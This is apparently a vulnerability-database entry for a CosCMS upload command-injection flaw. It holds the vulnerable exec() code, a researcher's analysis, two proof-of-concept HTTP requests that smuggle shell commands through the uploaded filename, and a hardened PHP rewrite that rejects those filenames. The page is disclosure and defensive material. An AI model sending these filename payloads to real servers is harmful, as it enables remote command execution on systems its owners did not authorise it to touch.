8.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:S/C:C/I:C/A:C
The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
In fact, it doesn't seem like the user should be authenticated at all. Looking at this request:
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name="title"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"
-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"
511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"
Update
-----------------------------21456260222104
According to my testing, authentication really isn't needed to reach the vulnerable code.
Vulnerability: The vulnerability resides in modules/gallery/upload/index.php, in the uploadFile() function, where exec() is called with partially user-controlled data:
$command = "mv " . $_FILES['file']['tmp_name'] . " $zip";
//die;
exec ($command, $output = array (), $res);
$command = "chmod 777 " . $zip;
exec ($command, $output = array (), $res);
$command = "unzip -o -UU " . $zip;
exec ($command, $output = array (), $res);
The $zip variable can be partially controlled:
$zip = "/tmp/" . $_FILES['file']['name'];
Since $_FILES['file']['name'] is used for injection, '/' is a badchar, which makes exploitation (of something useful) really difficult:
Execution is with www-data privileges by default, not a lot of things to do.
You are executing from modules/gallery/upload, where by default, and in the recommended installation, the user hasn't got write privileges. So the provided PoC by htbridge doesn't work at all in a default installation:
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
You cannot write file.txt in modules/gallery/upload by default.
My PoC:
POST /gallery/upload/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/gallery/view/1
Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473
Content-Length: 360
-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>"
Content-Type: text/plain
msf.txt
-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="submit"
Upload File
-----------------------------1107861128371857341391966473--
Assessed Attacker Value: 0
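A hardened version of the upload step, added here as an example (not CosCMS code and not the fix in the linked commit): it only accepts a plain .zip filename, chooses the on-disk name itself and replaces the three exec() calls with move_uploaded_file() and ZipArchive, so the client-supplied filename never reaches a shell. The allow-list pattern, the function names and the upload directory are assumptions.

```php
<?php
// Added example, not from the CosCMS project. Assumes the gallery expects a
// zip archive, as the original "unzip -o -UU $zip" call suggests.

// Validate the client filename against a strict allow-list and return a
// server-chosen on-disk name. Returns null for anything suspicious, so the
// page's payloads ("1 & ls -la > file.txt", "ls; <COMMAND>") are rejected.
function safeZipName(string $clientName): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.zip\z/', $clientName)) {
        return null;
    }
    // The client name is only used for validation; the stored name is random.
    return bin2hex(random_bytes(16)) . '.zip';
}

// Replaces the mv / chmod 777 / unzip shell pipeline with PHP APIs.
// If a shell call were ever unavoidable, every argument would at least
// need escapeshellarg(); here no command string is built at all.
function handleGalleryUpload(array $file, string $uploadDir): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    $name = safeZipName($file['name'] ?? '');
    if ($name === null) {
        return false;                 // rejected: filename fails allow-list
    }
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;                 // also confirms it really was an upload
    }
    $zip = new ZipArchive();
    if ($zip->open($dest) !== true) {
        unlink($dest);
        return false;
    }
    $ok = $zip->extractTo($uploadDir);  // replaces "unzip -o -UU"
    $zip->close();
    unlink($dest);
    return $ok;
}

// Self-check with the filenames from the two PoC requests above.
assert(safeZipName('1 & ls -la > file.txt') === null);
assert(safeZipName('ls; <COMMAND>') === null);
assert(safeZipName('gallery_2013.zip') !== null);
```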
archives.neohapsis.com/archives/bugtraq/2013-03/0033.html
osvdb.org/90927
www.coscms.org/blog/view/4/Version-1.822
www.exploit-db.com/exploits/24629
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1668
github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb78580190c
www.htbridge.com/advisory/HTB23145